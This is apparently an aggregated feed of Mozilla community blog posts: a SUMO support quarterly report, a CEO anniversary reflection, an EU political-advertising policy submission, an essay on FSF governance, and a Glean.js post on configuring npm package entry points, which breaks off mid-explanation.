  • More good news from Twitter-land: we finally regained access to the @SUMO_mozilla Twitter account (if you want to learn the backstory, watch our community call from March). Go follow the account if you haven’t, because we’re going to use it to share more community updates moving forward.
  • Check out the following release notes from Kitsune in the past quarter:

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in January, February, and March.
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you’re too shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats


KB Page views

Month | Page views | Vs previous month
January 2021 | 12,860,141 | +3.72%
February 2021 | 11,749,283 | -9.16%
March 2021 | 12,143,366 | +3.2%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Jeff
  3. Marchelo Ghelman
  4. Artist
  5. Underpass

KB Localization

Top 10 locales by total page views

Locale | Jan 2021 | Feb 2021 | Mar 2021 | Localization progress (per 6 Apr)
de | 11.69% | 11.3% | 10.4% | 98%
fr | 7.33% | 7.23% | 6.82% | 90%
es | 5.98% | 6.48% | 6.4% | 47%
zh-CN | 4.7% | 4.14% | 5.94% | 97%
ru | 4.56% | 4.82% | 4.41% | 99%
pt-BR | 4.56% | 5.41% | 5.8% | 72%
ja | 3.64% | 3.61% | 3.68% | 57%
pl | 2.56% | 2.54% | 2.44% | 83%
it | 2.5% | 2.44% | 2.45% | 95%
nl | 1.03% | 0.99% | 0.98% | 98%

Top 5 localization contributors in the last 90 days:

  1. Ihor_ck
  2. Artist
  3. Markh2
  4. JimSp472
  5. Goudron

Forum Support

Forum stats

Month | Total questions | Answer rate within 72 hrs | Solved rate within 72 hrs | Forum helpfulness
Jan 2021 | 3,936 | 68.50% | 15.52% | 70.21%
Feb 2021 | 3,582 | 65.33% | 14.38% | 77.50%
Mar 2021 | 3,639 | 66.34% | 14.70% | 81.82%

Top 5 forum contributors in the last 90 days:

  1. Cor-el
  2. FredMcD
  3. Jscher2000
  4. Sfhowes
  5. Seburo

Social Support

Channel | Jan 2021 total conv | Jan 2021 conv handled | Feb 2021 total conv | Feb 2021 conv handled | Mar 2021 total conv | Mar 2021 conv handled
@firefox | 3,675 | 668 | 3,403 | 136 | 2,998 | 496
@FirefoxSupport | 274 | 239 | 188 | 55 | 290 | 206

Top 5 contributors in Q1 2021

  1. Md Monirul Alom
  2. Andrew Truong
  3. Matt C
  4. Devin E
  5. Christophe Villeneuve

Play Store Support

We don’t have enough data for Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

  • What’s new in Firefox for Android
  • Additional messaging to set Firefox as a default app was added in Firefox for iOS 32.
  • There are also additional widgets for iOS, as well as bookmarking improvements, introduced in V32.

Other products / Experiments

  • VPN MacOS and Linux Release.
  • VPN Feature Updates Release.
  • Firefox Accounts Settings Updates.
  • Mozilla ION → Rally name change
  • Add-ons project – restoring search engine defaults.
  • Sunset of Amazon Fire TV.


If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

The Mozilla BlogReflections on One Year as the CEO of Mozilla

If we want the internet to be different we can’t keep following the same roadmap.

I am celebrating a one-year anniversary at Mozilla this week, which is funny in a way, since I have been part of Mozilla since before it had a name. Mozilla is in my DNA–and some of my DNA is in Mozilla. Twenty-two years ago I wrote the open-source software licenses that still enable our vision, and throughout my years here I’ve worn many hats. But one year ago I became CEO for the second time, and I have to say up front that being CEO this time around is the hardest role I’ve held here. And perhaps the most rewarding.

On this anniversary, I want to open up about what it means to be the CEO of a mission-driven organization in 2021, with all the complications and potential that this era of the internet brings with it. Those of you who know me, know I am generally a private person. However, in a time of rapid change and tumult for our industry and the world, it feels right to share some of what this year has taught me.

Six lessons from my first year as CEO:

1 AS CEO I STRADDLE TWO WORLDS: There has always been a tension at Mozilla, between creating products that reflect our values as completely as we can imagine, and products that fit consumers’ needs and what is possible in the current environment. At Mozilla, we feel the push and pull of competing in the market, while always seeking results from a mission perspective. As CEO, I find myself embodying this central tension.

It’s a tension that excites and energizes me. As co-founder and Chair, and Chief Lizard Wrangler of the Mozilla project before that, I have been the flag-bearer for Mozilla’s value system for many years. I see this as a role that extends beyond Mozilla’s employees. The CEO is responsible for all the employees, volunteers, products and launches and success of the company, while also being responsible for living up to the values that are at Mozilla’s core. Now, I once again wear both of these hats.

I have leaned on the open-source playbook to help me fulfill both of these obligations, attempting to wear one hat at a time, sometimes taking one off and donning the other in the middle of the same meeting. But I also find I am becoming more adept at seamlessly switching between the two, and I find that I can be intensely product oriented, while maintaining our mission as my true north.

2 MOZILLA’S MISSION IS UNCHANGED BUT HOW WE GET THERE MUST: This extremely abnormal year, filled with violence, illness, and struggle, has also confirmed something I already knew: that even amid so much flux, the DNA of Mozilla has not changed since we first formed the foundation out of the Netscape offices so many years ago. Yes, we once expanded our mission statement to be more explicit about the human experience, as a more complete statement of our values.

What has changed is the world around us. And — to stick with the DNA metaphor for a second here — that has changed the epigenetics of Mozilla. In other words, it has changed the way our DNA is expressed.

3 CHANGE REQUIRES FOLLOWING A NEW PATH: We want the internet to be different. We feel an urgency to create a new and better infrastructure for the digital world, to help people get the value of data in a privacy-forward way, and to connect entrepreneurs who also want a better internet.

By definition, if you’re trying to end up in a different place, you can’t keep following the same path. This is my working philosophy. Let me tell a quick story to illustrate what I mean.

Lately we’ve been thinking a lot about data, and what it means to be a privacy-focused company that brings the benefits of data to our users. This balancing act between privacy and convenience is, of course, not a new problem, but as I was thinking about the current ways it manifests, I was reminded of the early days of Firefox.

When we first launched Firefox, we took the view that data was bad — even performance metrics about Firefox that could help us understand how Firefox performs outside of our own test environments, we viewed as private data we didn’t want. Well, you see where this is going, don’t you? We quickly learned that without such data (which we call telemetry), we couldn’t make a well functioning browser. We needed information about when or why a site crashed, how long load times were, etc. And so we took one huge step with launching Firefox, and then we had to take a step sideways, to add in the sufficient — but no more than that! — data that would allow the product to be what users wanted.

In this story you can see how we approach the dual goals of Mozilla: to be true to our values, and to create products that enable people to have a healthier experience on the internet. We find ourselves taking a step sideways to reach a new path to meet the needs of our values, our community and our product.

4 THE SUM OF OUR PARTS: Mozilla’s superpower is that our mission and our structure allow us to benefit from the aggregate strength that’s created by all our employees and volunteers and friends and users and supporters and customers.

We are more than the sum of our parts. This is my worldview, and one of the cornerstones of open-source philosophy. As CEO, one of my goals is to find new ways for Mozilla to connect with people who want to build a better internet. I know there are many people out there who share this vision, and a key goal of the coming era is finding ways to join or help communities that are also working toward a better internet.

5 BRING ME AMBITIOUS IDEAS: I am always looking for good ideas, for big ideas, and I have found that as CEO, more people are willing to come to me with their huge ambitions. I relish it. These ideas don’t always come from employees, though many do. They also come from volunteers, from people outside the company entirely, from academics, friends, all sorts of people. They honor me and Mozilla by sharing these visions, and it’s important to me to keep that dialogue open.

I am learning that it can be jarring to have your CEO randomly stop by your desk for a chat — or in remote working land, to Slack someone unexpectedly — so there need to be boundaries in place, but having a group of people who I can trust to be real with me, to think creatively with me, is essential.

The pandemic has made this part of my year harder, since it has removed the serendipity of conversations in the break room or even chance encounters at conferences that sometimes lead to the next great adventure. But Mozilla has been better poised than most businesses to have an entirely remote year, given that our workforce was already between 40 and 50 percent distributed to begin with.

6 WE SEEK TO BE AN EXAMPLE: One organization can’t change everything. At Mozilla, we dream of an internet and software ecosystem that is diverse and distributed, that uplifts and connects and enables visions for all, not just those companies or people with bottomless bank accounts. We can’t bring about this change single handedly, but we can try to change ourselves where we think we need improvement, and we can stand as an example of a different way to do things. That has always been what we wanted to do, and it remains one of our highest goals.

Above all, this year has reinforced for me that sometimes a deeply held mission requires massive wrenching change in order to be realized. I said last year that Mozilla was entering a new era that would require shifts. Our growing ambition for mission impact brings the will to make these changes, which are well underway. From the earliest days of our organization, people have been drawn to us because Mozilla captures an aspiration for something better and the drive to actually make that something happen. I cannot overstate how inspiring it is to see the dedication of the Mozilla community. I see it in our employees, I see it in our builders, I see it in our board members and our volunteers. I see it in all those who think of Mozilla and support our efforts to be more effective and have more impact. I wouldn’t be here without it. It’s the honor of my life to be in the thick of it with the Mozilla community.

– Mitchell

The post Reflections on One Year as the CEO of Mozilla appeared first on The Mozilla Blog.

Mozilla Privacy BlogMozilla weighs in on political advertising for Commission consultation

Later this year, the European Commission is set to propose new rules to govern political advertising. This is an important step towards increasing the resilience of European democracies, and to respond to the changes wrought by digital campaigning. As the Commission’s public consultation on the matter has come to a close, Mozilla stresses the important role of a healthy internet and reiterates its calls for systemic online advertising transparency globally. 

In recent years political campaigns have increasingly shifted to the digital realm – even more so during the pandemic. This allows campaigners to engage different constituencies in novel ways and enables them to campaign at all when canvassing in the streets is impossible due to public health reasons. However, it has also given rise to new risks. For instance, online political advertising can serve as an important and hidden vector for disinformation, defamation, voter suppression, and evading pushback from political opponents or fact checkers. The ways in which platforms’ design and practices facilitate this and the lack of transparency in this regard have therefore become subject to ever greater scrutiny. This reached a high point around the U.S. presidential elections last year, but it is important to continue to pay close attention to the issue as other countries go to the polls for major elections – in Europe and beyond.

At Mozilla, we have been working to hold platforms more accountable, particularly with regard to advertising transparency and disinformation (see, for example, here, here, here, and here). Pushing for wide-ranging transparency is critical in this context: it enables communities to uncover and protect from harms that platforms alone cannot or fail to avert. We therefore welcome the Commission’s initiative to develop new rules to this end, which Member States can expand upon depending on the country-specific context. The EU Code of Practice on Disinformation, launched in 2019 and which Mozilla is a signatory of, was a first step in the right direction to improve the scrutiny of and transparency around online advertisements. In recent years, large online platforms have made significant improvements in this regard – but they still fall short in various ways. This is why we continue to advocate the mandatory disclosure of all online advertisements, as reflected in our recommendations for the Digital Services Act (DSA) and the European Democracy Action Plan.

As the Commission prepares its proposal, we recommend that lawmakers in the EU and elsewhere consider the following measures, which we believe can enhance transparency and accountability with respect to online political advertising and ultimately increase the resilience of democracies everywhere:

  • Develop a clear definition of political advertising: Defining political advertising is a complicated exercise, forcing regulators to draw sharp lines over fuzzy boundaries. Nonetheless, in order to ensure heightened oversight, we need a functional definition of what does and does not constitute political advertising. In coming up with a definition, regulators should engage with experts from civil society, academia, and industry and draw inspiration from “offline” definitions of political advertising.
  • Address novel forms of political advertising online: When defining political advertising, regulators should also include political content that users are paid by political actors to create and promote (i.e. paid influencer content). Platforms should provide self-disclosure mechanisms for users to indicate these partnerships when they upload content (as Instagram and YouTube have done). This self-disclosed political advertising should be labeled as such to end-users and be included in the ad archives maintained by platforms.
  • Ramp up disclosure obligations for ‘political’ advertising: As part of its proposal for the DSA, the Commission already foresees a mandate for large platforms to publicly disclose all advertisements through ad archive APIs in order to facilitate increased scrutiny and study of online advertising. These disclosure obligations closely resemble those previously advocated by Mozilla. Importantly, this would apply to all advertising so as to prevent under-disclosure should some relevant advertisements elude an eventual definition of political advertising. With this baseline, enhanced disclosure obligations should be required for advertisements that are considered political given their special role in and potentially harmful effects on the democratic process and public discourse. Amongst others, Stiftung Neue Verantwortung, the European Partnership for Democracy, and ourselves have offered ideas on the specifics of such an augmented disclosure regime. For example, this should include more fine-grained information on targeting parameters and methods used by advertisers, audience engagement, ad spend, and other versions of the ad in question that were used for a/b testing.
  • Enhance user-facing transparency: Information on political advertising should not only be available via ad archive APIs, but also directly to users as they encounter an advertisement. Such ads should be labeled in a way that clearly distinguishes them from organic content. Additional information, for example on the sponsor or on why a person was targeted, should be presented in an intelligible manner and either be included in the label or easily accessible from the specific content display. Further, platforms could be obliged to allow third parties to build tools providing users with new insights about, for instance, how and by whom they are being targeted.

Finally, we recommend that the Commission explore the following approaches should it seek to put limits on microtargeting of political advertisements in its upcoming proposal:

  • Restrict targeting parameters: Parameters for micro-targeting of political advertising could exclude sensitive, behavioral, and inferred information as well as information from external datasets uploaded by advertisers, as others have argued. In line with Mozilla’s commitment to Lean Data Practices, this would discourage large-scale data collection by political advertisers and level the playing field for those who lack large amounts of data – so that political campaigns remain competitions of ideas, not of who collects the most data.

While online political advertising and our understanding of the accompanying challenges will continue to evolve, the recommended measures would help make great strides towards protecting the integrity of elections and civic discourse. We look forward to working with lawmakers and the policy community to advance this shared objective and ensure that the EU’s new rules will hit the mark.

The post Mozilla weighs in on political advertising for Commission consultation appeared first on Open Policy & Advocacy.

The Firefox FrontierYou’ve been scraped, the Facebook data leak explained

In early April, it was reported that there had been a Facebook data leak, raising alarms among Facebook account holders. Half a billion Facebook accounts were impacted. The dataset is … Read more

The post You’ve been scraped, the Facebook data leak explained appeared first on The Firefox Frontier.

The Firefox FrontierMozilla Explains: SIM swapping

These days, smartphones are in just about everyone’s pocket. We use them for entertainment, sending messages, storing notes, taking photos, transferring money and even making the odd phone call. Our … Read more

The post Mozilla Explains: SIM swapping appeared first on The Firefox Frontier.

Luis VillaGoverning Values-Centered Tech Non-Profits; or, The Route Not Taken by FSF

A few weeks ago, I interviewed my friend Katherine Maher on leading a non-profit under some of the biggest challenges an org can face: accusations of assault by leadership, and a growing gap between mission and reality on the ground.

We did the interview at the Free Software Foundation’s Libre Planet conference. We chose that forum because I was hopeful that the FSF’s staff, board, and membership might want to learn about how other orgs had risen to challenges like those faced by FSF after Richard Stallman’s departure in 2019. I, like many others in this space, have a soft spot for the FSF and want it to succeed. And the fact my talk was accepted gave me further hope.

Unfortunately, the next day it was announced at the same conference that Stallman would rejoin the FSF board. This made clear that the existing board tolerated Stallman’s terrible behavior towards others, and endorsed his failed leadership—a classic case of non-profit founder syndrome.

While the board’s action made the talk less timely, much of the talk is still, hopefully, relevant to any value-centered tech non-profit that is grappling with executive misbehavior and/or simply keeping up with a changing tech world. As a result, I’ve decided to present here some excerpts from our interview. They have been lightly edited, emphasized, and contextualized. The full transcript is here.

Sunlight Foundation: harassment, culture, and leadership

In the first part of our conversation, we spoke about Katherine’s tenure on the board of the Sunlight Foundation. Shortly after she joined, Huffington Post reported on bullying, harassment, and rape accusations against a key member of Sunlight’s leadership team.

[I had] worked for a long time with the Sunlight Foundation and very much valued what they’d given to the transparency and open data open government world. I … ended up on a board that was meant to help the organization reinvent what its future would be.

I think I was on the board for probably no more than three months, when an article landed in the Huffington Post that went back 10 years looking at … a culture of exclusion and harassment, but also … credible [accusations] of sexual assault.

And so as a board … we realized very quickly that there was no possible path forward without really looking at our past, where we had come from, what that had done in terms of the culture of the institution, but also the culture of the broader open government space.


Practical impacts of harassment

Sunlight’s board saw immediately that an org cannot effectively grapple with a global, ethical technological future if the org’s leadership cannot grapple with its own culture of harassment. Some of the pragmatic reasons for this included:

The [Huffington Post] article detailed a culture of heavy drinking and harassment, intimidation.

What does that mean for an organization that is attempting to do work in sort of a progressive space of open government and transparency? How do you square those values from an institutional mission standpoint? That’s one [pragmatic] question.

Another question is, as an organization that’s trying to hire, what does this mean for your employer brand? How can you even be an organization that’s competitive [for hiring] if you’ve got this culture out there on the books?

And then the third pragmatic question is … [w]hat does this mean for like our funding, our funders, and the relationships that we have with other partner institutions who may want to use the tools?


FSF suffers from similar pragmatic problems—problems that absolutely can’t be separated from the founder’s inability to treat all people as full human beings worthy of his respect. (Both of the tweets below lead to detailed threads from former FSF employees.)

Since the announcement of Stallman’s return, all top leadership of the organization have resigned, and former employees have detailed how the FSF staff has (for over a decade) had to deal with Richard’s unpleasant behavior, leading to morale problems, turnover, and even unionization explicitly to deal with RMS.

And as for funding, compare the 2018 sponsor list with the current, much shorter sponsor list.

So it seems undeniable: building a horrible culture has pragmatic impacts on an org’s ability to espouse its values.

Values and harassment

Of course, a values-centered organization should be willing to anger sponsors if it is important for their values. But at Sunlight, it was also clear that dealing with the culture of harassment was relevant to their values, and the new board had to ask hard questions about that:

The values questions, which … are just as important, were… what does this mean to be an organization that focuses on transparency in an environment in which we’ve not been transparent about our past?

What does it mean to be an institution that [has] progressive values in the sense of inclusion, a recognition that participation is critically important? … Is everyone able to participate? How can we square that with the institution that are meant to be?

And what do we do to think about justice and redress for (primarily the women) who are subjected to this culture[?]


Unlike Sunlight, FSF is not about transparency, per se, but RMS at his best has always been very strong about how freedom had to be for everyone. FSF is an inherently political project! One can’t advocate for the rights of everyone if, simultaneously, one treats staff disposably and women as objects to be licked without their consent, and half the population (women) responds by actively avoiding the leadership of the “movement”.

So, in this situation, what is a board to do? In Sunlight’s case:

[Myself and fellow board member Zoe Reiter] decided that this was a no brainer, we had to do an external investigation.

The challenges of doing this… were pretty tough. [W]e reached out to everyone who’d been involved with the organization: not just employees, but also people who’d been involved in transparency camps and other sorts of initiatives that Sunlight had run.

We put out calls for participation on our blog; we hired a third party legal firm to do investigation and interviews with people who had been affected.

We were very open in the way that we thought about who should be included in that—not just employees, but anyone who had something that they wanted to raise. That produced a report that we then published to the general public, really trying to account for some of the things that have been found.


The report Katherine mentions is available in two parts (results, recommendations) and is quite short (nine pages total).

While most of the report is quite specific to the Sunlight Foundation’s specific situation, the FSF board should particularly have read page 3 of the recommendations: “Instituting Board Governance Best Practices”. Among other recommendations relevant to many tech non-profits (not just FSF!), the report says Sunlight should “institute term limits” and “commit to a concerted effort to recruit new members to grow the Board and its capacity”.

Who can investigate a culture? When?

Katherine noted that self-scrutiny is not just something for large orgs:

[W]hen we published this report, part of what we were hoping for was that … we wanted other organizations to be able to approach this in similar challenges with a little bit of a blueprint for how one might do it. Particularly small orgs.

There were four of us on the board. Sunlight is a small organization—15 people. The idea that even smaller organizations don’t have the resources to do it was something that we wanted to stand against and say: actually, this is something that every organization should be able to take on, regardless of the resources available to them.


It’s also important to note that the need for critical self scrutiny is not something that “expires” if not undertaken immediately—communities are larger, and longer-lived, than the relevant staff or boards, so even if the moment seems to be in the relatively distant past, an investigation can still be valuable for rebuilding organizational trust and effectiveness.

[D]espite the fact that this was 10 years ago, and none of us were on the board at this particular time, there is an accounting that we owe to the people who are part of this community, to the people who are our stakeholders in this work, to the people who use our tools, to the people who advocated, who donated, who went on to have careers who were shaped by this experience.

And I don’t just mean, folks who were in the space still—I mean, folks who were driven out of the space because of the experiences they had. There was an accountability that we owed. And I think it is important that we grappled with that, even if it was sort of an imperfect outcome.


Winding down Sunlight

As part of the conclusion of the report on culture and harassment, it was recommended that the Sunlight board “chart a new course forward” by developing a “comprehensive strategic plan”. As part of that effort, the board eventually decided to shut the organization down—not because of harassment, but because in many ways the organization had been so successful that it had outlived its purpose.

In Katherine’s words:

[T]he lesson isn’t that we shut down because there was a sexual assault allegation, and we investigated it. Absolutely not!

The lesson is that we shut down because as we went through this process of interrogating where we were, as an organization, and the culture that was part of the organization, there was a question of what would be required for us to shift the organization into a more inclusive space? And the answer is a lot of that work had already been done by the staff that were there…

But the other piece of it was, does it work? Does the world need a Sunlight right now? And the answer, I think, in in large part was not to do the same things that Sunlight had been doing. …

The organization spawned an entire community of practitioners that have gone on to do really great work in other spaces. And we felt as though that sort of national-level governmental transparency through tech wasn’t necessarily needed in the same way as it had been 15 years prior. And that’s okay, that’s a good thing.


We were careful to say at Libre Planet that I don’t think FSF needs to shut down because of RMS’s terrible behavior. But the reaction of many, many people to “RMS is back on the FSF board” is “who cares, FSF has been irrelevant for decades”.

That should be of great concern to the board. As I sometimes put it—free licenses have taken over the world, and despite that the overwhelming consensus is that open won and (as RMS himself would say) free lost. This undeniable fact reflects very badly on the organization whose nominal job it is to promote freedom. So it’s absolutely the case that shutting down FSF, and finding homes for its most important projects in organizations that do not suffer from deep governance issues, should be an option the current board and membership consider.

Which brings us to the second, more optimistic topic: how did Wikimedia react to a changing world? It wasn’t by shutting down! Instead, it was by building on what was already successful to make sure they were meeting their values—an option that is also still very much available to FSF.

Wikimedia: rethinking mission in a changing world

Wikimedia’s vision is simple: “A world in which every single human can freely share in the sum of all knowledge.” And yet, in Katherine’s telling, it was obvious that there was still a gap between the vision, the state of the world, and how the movement was executing.

We turned 15 in 2016 … and I was struck by the fact that when I joined the Wikimedia Foundation, in 2014, we had been building from a point of our founding, but we were not building toward something.

So we were building away from an established sort of identity … a free encyclopedia that anyone can edit; a grounding in what it means to be a part of open culture and free and libre software culture; an understanding that … But I didn’t know where we were going.

We had gotten really good at building an encyclopedia—imperfect! there’s much more to do!—but we knew that we were building an encyclopedia, and yet … to what end?

Because “a free world in which every single human being can share in the sum of all knowledge”—there’s a lot more than an encyclopedia there. And there’s all sorts of questions:

About what does “share” mean?

And what does the distribution of knowledge mean?

And what does “all knowledge” mean?

And who are all these people—“every single human being”? Because we’ve got like a billion and a half devices visiting our sites every month. But even if we’re generous, and say, that’s a billion people, that is not the entirety of the world’s population.


As we discussed during parts of the talk not excerpted here, usage by a billion people is not failure! And yet, it is not “every single human being”, and so WMF’s leadership decided to think strategically about that gap.

FSF’s leadership could be doing something similar—celebrating that GPL is one of the most widely-used legal documents in human history, while grappling with the reality that the preamble to the GPL is widely unheeded; celebrating that essentially every human with an internet connection interacts with GPL-licensed software (Linux) every day, while wrestling deeply with the fact that they’re not free in the way the organization hopes.

Some of the blame for that does in fact lie with capitalism and particular capitalists, but the leadership of the FSF must also reflect on their role in those failures if the organization is to effectively advance their mission in the 2020s and beyond.

Self-awareness for a successful, but incomplete, movement

With these big questions in mind, WMF embarked on a large project to create a roadmap, called the 2030 Strategy. (We talked extensively about “why 2030”, which I thought was interesting, but won’t quote here.)

WMF could have talked only to existing Wikimedians about this, but instead (consistent with their values) went more broadly, working along four different tracks. Katherine talked about the tracks in this part of our conversation:

We ran one that was a research track that was looking at where babies are born—demographics I mentioned earlier [e.g., expected massive population growth in Africa—omitted from this blog post but talked about in the full transcript.]

[Another] was who are our most experienced contributors, and what did they have to say about our projects? What do they know? What’s the historic understanding of our intention, our values, the core of who we are, what is it that motivates people to join this project, what makes our culture essential and important in the world?

Then, who are the people who are our external stakeholders, who maybe are not contributors in the sense of contributors to the code or contributors to the projects of content, but are the folks in the broader open tech world? Who are folks in the broad open culture world? Who are people who are in the education space? You know, stakeholders like that? “What’s the future of free knowledge” is what we basically asked them.

And then we went to folks that we had never met before. And we said, “Why don’t you use Wikipedia? What do you think of it? Why would it be valuable to you? Oh, you’ve never even heard of it. That’s so interesting. Tell us more about what you think of when you think of knowledge.” And we spent a lot of time thinking about what these… new readers need out of a project like Wikipedia. If you have no sort of structural construct for an encyclopedia, maybe there’s something entirely different that you need out of a project for free knowledge that has nothing to do with a reference—an archaic reference—to bound books on a bookshelf.


This approach, which focused not just on the existing community but on data, partners, and non-participants, has been extensively documented at 2030.wikimedia.org, and can serve as a model for any organization seeking to re-orient itself during a period of change—even if you don’t have the same resources as Wikimedia does.

Unfortunately, this is almost exactly the opposite of the approach FSF has taken. FSF has become almost infamously insulated from the broader tech community, in large part because of RMS’s terrible behavior towards others. (The list of conference organizers who regret allowing him to attend their events is very long.) Nevertheless, given its important role in the overall movement’s history, I suspect that good faith efforts to do this sort of multi-faceted outreach and research could work—if done after RMS is genuinely at arms-length.

Updating values, while staying true to the original mission

The Wikimedia strategy process led to a vision that extended and updated, rather than radically changed, Wikimedia’s strategic direction:

By 2030, Wikimedia will become the essential infrastructure of the ecosystem of free knowledge, and anyone who shares our vision will be able to join us.


In particular, the focus was around two pillars, which were explicitly additive to the traditional “encyclopedic” activities:

Knowledge equity, which is really around thinking about who’s been excluded and how we bring them in, and what are the structural barriers that enable that exclusion or created that exclusion, rather than just saying “we’re open and everyone can join us”. And how do we break down those barriers?

And knowledge as a service, which is, yes, thinking about the technical components of what a service-oriented architecture is, but also how do we make knowledge useful beyond just being a website?


I specifically asked Katherine about how Wikimedia was adding to the original vision and mission because I think it’s important to understand that a healthy community can build on its past successes without obliterating or ignoring what has come before. Many in the GNU and FSF communities seem to worry that moving past RMS somehow means abandoning software freedom, which should not be the case. If anything, this should be an opportunity to re-commit to software freedom—in a way that is relevant and actionable given the state of the software industry in 2021.

A healthy community should be able to handle that discussion! And if the GNU and FSF communities cannot, it’s important for the FSF board to investigate why that is the case.

Checklists for values-centered tech boards

Finally, at two points in the conversation, we went into what questions an organization might ask itself that I think are deeply pertinent for not just the FSF but virtually any non-profit, tech or otherwise. I loved this part of the discussion because one could almost split it out into a checklist that any board member could use.

The first set of questions came in response to a question I asked about Wikidata, which did not exist 10 years ago but is now central to the strategic vision of knowledge infrastructure. I asked if Wikidata had almost been “forced on” the movement by changes in the outside world, to which Katherine said:

Wikipedia … is a constant work in progress. And so our mission should be a constant work in progress too.

How do we align against a north star of our values—of what change we’re trying to effect in the world—while adapting our tactics, our structures, our governance, to the changing realities of the world?

And also continuously auditing ourselves to say, you know, when we started, was this serving a certain cohort? Does the model of serving that cohort still help us advance our vision today?

Do we need to structurally change ourselves in order to think about what comes next for our future? That’s an incredibly important thing, and also saying, maybe that thing that we started out doing, maybe there’s innovation out there in the world, maybe there are new opportunities that we can embrace, that will enable us to expand the impact that we have on the world, while also being able to stay true to our mission and ourselves.


And to close the conversation, I asked how one aligns the pragmatic and organizational values as a non-profit. Katherine responded that governance was central, with again a great set of questions all board members should ask themselves:

[Y]ou have to ask yourself, like, where does power sit on your board? Do you have a regenerative board that turns over so that you don’t have the same people there for decades?

Do you ensure that funders don’t have outsize weight on your board? I really dislike the practice of having funders on the board, I think it can be incredibly harmful, because it tends to perpetuate funder incentives, rather than, you know, mission incentives.

Do you think thoughtfully about the balance of power within those boards? And are there … clear bylaws and practices that enable healthy transitions, both in terms of sustaining institutional knowledge—so you want people who are around for a certain period of time, balanced against fresh perspective.

[W]hat are the structural safeguards you put in place to ensure that your board is both representative of your core community, but also the communities you seek to serve?

And then how do you interrogate, on, I think, a three-year cycle? … So every three years we … are meant to go through a process of saying “what have we done in the past three, does this align?” and then on an annual basis, saying “how did we do against that three year plan?” So if I know in 15 years, we’re meant to be the essential infrastructure of free knowledge, well what do we need to clean up in our house today to make sure we can actually get there?

And some of that stuff can be really basic. Like, do you have a functioning HR system? Do you have employee handbooks that protect your people? … Do you have a way of auditing your performance with your core audience or core stakeholders so that you know that the work of your institution is actually serving the mission?

And when you do that on an annual basis, you’re checking in with yourself on a three year basis, you’re saying this is like the next set of priorities. And it’s always in relation to that higher vision. So I think every nonprofit can do that. Every size. Every scale.


The hard path ahead

The values that the FSF espouses are important and world-changing. And with the success of the GPL in the late 1990s, the FSF had a window of opportunity to become an ACLU of the internet, defending human rights in all their forms. Instead, under Stallman’s leadership, the organization has become estranged and isolated from the rest of the (flourishing!) digital liberties movement, and even from the rest of the software movement it was critical in creating.

This is not the way it had to be, nor the way it must be in the future. I hope our talk, and the resources I link to here, can help FSF and other value-centered tech non-profits grow and succeed in a world that badly needs them.

Beatriz RizentalThis Week in Glean: Publishing Glean.js or How I configured an npm package that has multiple entry points

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online).

All “This Week in Glean” blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.

A few weeks ago, the time came for us to publish the first version of Glean.js on npm. (Yes, it has been published. Go take a look). In order to publish a package on npm, it is important to define the package entry points in the project’s package.json file. The entry point is the path to the file that should be loaded when users import a package through import Package from "package-name" or const Package = require("package-name").

My knowledge in this area went as far as “Hm, I think that main field in the package.json is where we define the entry point, right?”. Yes, I was right about that, but it turns out that was not enough for Glean.js.

The case of Glean.js

Glean.js is an implementation of Glean for Javascript environments. “Javascript environments” can mean multiple things: Node.js servers, Electron apps, websites, webextensions… The list goes on. To complicate things, Glean.js needs to access a bunch of platform specific APIs such as client side storage. We designed Glean.js in such a way that platform specific code is abstracted away under the Platform module, but when users import Glean.js all of this should be opaque.

So, we decided to provide a different package entry point per environment. This way, users can import the correct Glean for their environment and not care about internal architecture details, e.g. import Glean from "glean/webext" imports the version of Glean that uses the web extensions implementation of the Platform module.

The main field I mentioned above works when the package has one single entry point. What do you do when the package has multiple entry points?

The exports field

Lucky for us, starting from Node v12.7.0, Node recognizes the exports field in the package.json. This field accepts objects, so you can define mappings for all your package entry points.

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": "path/to/entry/point/node.js",

Another nice thing about the exports field is that it denies access to any entry point that is not defined in the exports map. Users can’t just import any file in your package anymore. Neat.

We must also define entry points for the type declarations of our package. Type declarations are necessary for users attempting to import the package in Typescript code. Glean.js is in Typescript, so it is easy enough for us to generate the type definitions, but we hit a wall when we want to expose the generated definitions. From the “Publishing” page of Typescript’s documentation, this is the example provided:

  "name": "awesome",
  "author": "Vandelay Industries",
  "version": "1.0.0",
  "main": "./lib/main.js",
  "types": "./lib/main.d.ts"

Notice the types property. It works just like the main property. It does not accept an object, only a single entry point. And here we go again, what do you do when the package has multiple entry points?

The typesVersions workaround

This time I won’t say “Lucky for us Typescript has this other property starting from version…”. Turns out Typescript, as I am writing this blog post, doesn’t yet provide a way for packages to define multiple entry points for their types declarations.

Typescript lets packages define different types declarations per Typescript version, through the typesVersions property. This property does accept mappings of entry points to files. Smart people on the internet figured out that we can use this property to define different types declarations for each of our package entry points. For more discussion on the topic, follow issue #33079.

Back to our previous example, type definitions mappings would look like this in our package.json:

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": "path/to/entry/point/node.js",
  "typesVersions": {
    "*": {
      "./webext": [ "path/to/types/definitions/webext.d.ts" ],
      "./node": [ "path/to/types/definitions/node.d.ts" ],

Alright, this is great. So we are done, right? Not yet.

Conditional exports

Our users can finally import our package in Javascript and Typescript and they have well defined entry points to choose from depending on the platform they are building for.

If they are building for Node.js though, they still might encounter issues. The default module system used by Node.js is CommonJS. This is the one where we import packages by using the const Package = require("package") syntax and export modules by using the module.exports = Package syntax.

Newer versions of Node also support the ECMAScript module system, also known as ESM. This is the official Javascript module system and is the one where we import packages by using the import Package from "package" syntax and export modules by using the export default Package syntax.

